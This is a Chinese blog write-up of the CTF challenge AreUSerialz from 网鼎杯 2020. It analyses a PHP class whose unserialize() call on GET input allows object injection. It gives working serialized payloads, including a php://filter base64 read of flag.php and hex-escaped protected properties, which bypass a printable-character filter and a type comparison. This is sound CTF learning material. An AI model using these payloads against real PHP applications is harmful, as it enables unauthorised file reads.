[网鼎杯 2020 青龙组]AreUSerialz 1

已于 2022-04-28 12:20:24 修改
阅读量839 收藏 2
点赞数
分类专栏: buuctf 文章标签: web安全 php
于 2022-04-28 12:13:06 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62879498/article/details/124470846
版权

[网鼎杯 2020 青龙组]AreUSerialz 1

拿到页面源代码 我们首先发现 存在文件包含 直接翻到最下面

function is_valid($s) {
    for($i = 0; $i < strlen($s); $i++)
        if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125))
            return false;
    return true;
}

if(isset($_GET{'str'})) {

    $str = (string)$_GET['str'];
    if(is_valid($str)) {
        $obj = unserialize($str);
    }

}

发现两点: 一是我们 get传参的内容ascii值必须在 32到125 之间,换句话说序列化后的字符必须都是可视化字符,一个是代码进行了反序列化 我们在传参的时候要进行序列化编码。

根据以上两点我们可以进行绕过

而比较有意思的是 protected的序列化是不可见字符

再进行上面的代码审计:

因为我们只是对 flag.php进行一个读取,所以说我们不需要了解 write 函数

class FileHandler {

    protected $op;
    protected $filename;
    protected $content;

    function __construct() {
        $op = "1";
        $filename = "/tmp/tmpfile";
        $content = "Hello World!";
        $this->process();
    }
    
    public function process() {
        if($this->op == "1") {
            $this->write();
        } else if($this->op == "2") {
            $res = $this->read();
            $this->output($res);
        } else {
            $this->output("Bad Hacker!");
        }
    }
      private function read() {
        $res = "";
        if(isset($this->filename)) {
            $res = file_get_contents($this->filename);
        }
        return $res;
    }

    private function output($s) {
        echo "[Result]: <br>";
        echo $s;
    }

__destruct()魔术方法中,op==="2"是强比较,而process()使用的是弱比较op==“2”,可以利用弱类型绕过。
让op为整型 op=2 即可绕过

public绕过

PHP7.1以上版本对属性类型不敏感,而public属性序列化不会出现不可见字符,可以用public属性来绕过

<?php
 

class FileHandler {
 
    public $op = "2";
    public  $filename = "flag.php";
    public  $content;
}

 

 
 
?>

构造payload

?str=O:11:"FileHandler":3:{s:2:"op";s:2:"%202";s:8:"filename";s:8:"flag.php";s:7:"content";}

访问源代码即可获得 flag

在这里插入图片描述

php伪协议过(也利用了上一种方法的public绕过)

至此我们就可以

protect $op = 2;
protect $filename = "php://filter/read=convert.base64-encode/resource=flag.php";
protect $content;

对其进行序列化:

s:2:"op";i:2;s:8:"filename";s:57:"php://filter/read=convert.base64-encode/resource=flag.php";s:7:"content";

构造payload:

?str=O:11:"FileHandler":3:{s:2:"op";i:2;s:8:"filename";s:57:"php://filter/read=convert.base64-encode/resource=flag.php";s:7:"content";}

在这里插入图片描述

在这里插入图片描述

protect绕过参考博客

再在本关我们也是可以使用protect 。

private属性序列化的时候会引入两个\x00,注意这两个\x00就是ascii码为0的字符。这个字符显示和输出可能看不到,甚至导致截断,但是url编码后就可以看得很清楚了。同理,protected属性会引入\x00*\x00。此时,为了更加方便进行反序列化Payload的传输与显示,我们可以在序列化内容中用大写S表示字符串,此时这个字符串就支持将后面的字符串用16进制表示。
所以构造payload:

O:11:"FileHandler":3:{S:5:"\00*\00op";i:2;S:11:"\00*\00filename";S:8:"flag.php";S:10:"\00*\00content";S:7:"oavinci";}

同样可以获得 flag
在这里插入图片描述

hcjtn
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
2020龙组白虎组部分试题.rar
05-14
2020龙组白虎组部分试题 ,包括密码、杂项、逆向、PWN。希望可以帮助到大家复习。此次龙难度大于白虎。
2020年龙组赛题.zip
05-10
比赛试题附件,其中包括misc,re,crypto,pwn,这些资源仅供学习参考,禁止用于盈利活动。希望大家可以合理利用,谢谢。
龙组18道.rar
06-11
2020龙组的题目压缩包,里面已经分好类了。
20200510.龙组.zip
06-10
2020 5 10 龙组 比赛题目 web没有附件 其他基本都有 , 感谢各位师傅的整理
2020龙组Boom
05-12
2020龙组Boom。如果需要的可以下载,其实就是解方程而已,没啥难度。
[杯 2020 龙组]AreUSerialz
Sk1y的博客
03-02 2836
[杯 2020 龙组]AreUSerialz 目录 题目:在buu平台上,题目传送门 解题过程: 两个防护: is_valid() destruct()魔术方法 本地进行序列化操作 题目:在buu平台上 解题过程: 代码审计 <?php include("flag.php"); highlight_file(__FILE__); class FileHandler { protected $op; protected $filename;
BUUCTF [杯 2020 龙组]AreUSerialz1
weixin_74410605的博客
08-20 331
得到O:11:"FileHandler":3:{s:2:"op";通过认真看代码及理解代码,根据op=2且filename=flag.php写出相应的反序列化代码构造payload即可得出flag。接着ctrl+u查看源码即可得到flag。
[杯 2020 龙组]AreUSerialz 1参考解析
weixin_52003758的博客
01-28 3030
进入题目,便是php的代码 这是一个代码审计题目(序列化和反序列化) 【注】在代码中我已经给出了部分的注释 <?php // 文件包含 include("flag.php"); highlight_file(__FILE__); // 阐述FileHandler类 class FileHandler { protected $op; protected $filename; protected $content; // 构造函数,将op filename c
BUUCTF [杯 2020 龙组]AreUSerialz 1 (两种解法 超详细!)
最新发布
m0_73734159的博客
11-27 1386
*include() ** 包含函数 ** ****is_valid() ** 检查对象变量是否已经实例化,即实例变量的值是否是个有效的对象。**file_get_contents() ** 函数把整个文件读入一个字符串中。**file_put_contents() **函数把一个字符串写入文件中。
【CTF WriteUp】龙组 Misc题解复现(整理,WP非原创)
cccchhhh6819的博客
05-26 3232
(原本还打算四场Crypto全刷的,结果第四场被教做人了,算了整理点别的当补偿了) (另:求白虎组 Misc-boot 的 WP) Misc 虚幻2 图片在RGB信道各有一张图,提出来 R: G: B: 注意到R和B均是31 * 10,G是31 * 11,所以肯定是将这三个图拼成一个方形。根据2018年杯的题目内容,该方形应该为汉信码。经实验,将三张图以GBR顺序,每行像素轮流提出后并拼接在一起,可以得到一个类似汉信码的图。将该图上下颠倒,并将左下角方块旋转180度后,得到如下汉信码: 可以看到
2020年龙组web AreUSerialz详解
永远是少年
12-20 598
今天继续给大家介绍CTF刷题,本文主要内容是2020年龙组web AreUSerialz详解。 一、题目简介 二、PHP代码分析 三、解题实战
[杯 2020 龙组]AreUSerialz1
陈艺秋的博客
07-05 668
如果 $str 经过 is_valid() 函数的检查,返回 true,则使用 unserialize() 函数对 $str 进行反序列化操作,并将结果赋值给变量 $obj。op,filename,$content三个变量权限都是protected,而protected权限的变量在序列化的时会有%00*%00字符,%00字符的ASCII码为0,就无法通过上面的is_valid函数校验。则将 $op 的值修改为 "1",并清空 $content,然后再次调用 process() 方法。
web buuctf [杯 2020 龙组]AreUSerialz1
weixin_44214568的博客
03-17 787
1.代码审计(魔法函数,序列化) 2.成员变量关键字 public、protected、private 代码粘贴如下: <?php include("flag.php"); highlight_file(__FILE__); class FileHandler { protected $op; protected $filename; protected $content; function __construct() { $op =
允许外访问龙面板
10-10
要允许外访问龙面板,您需要进行以下操作: 1. 配置防火墙规则:确保服务器的防火墙允许外部访问面板的端口。默认情况下,龙面板使用的是5700端口,您可以根据自己的需要进行配置。 2. 配置面板监听地址:...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值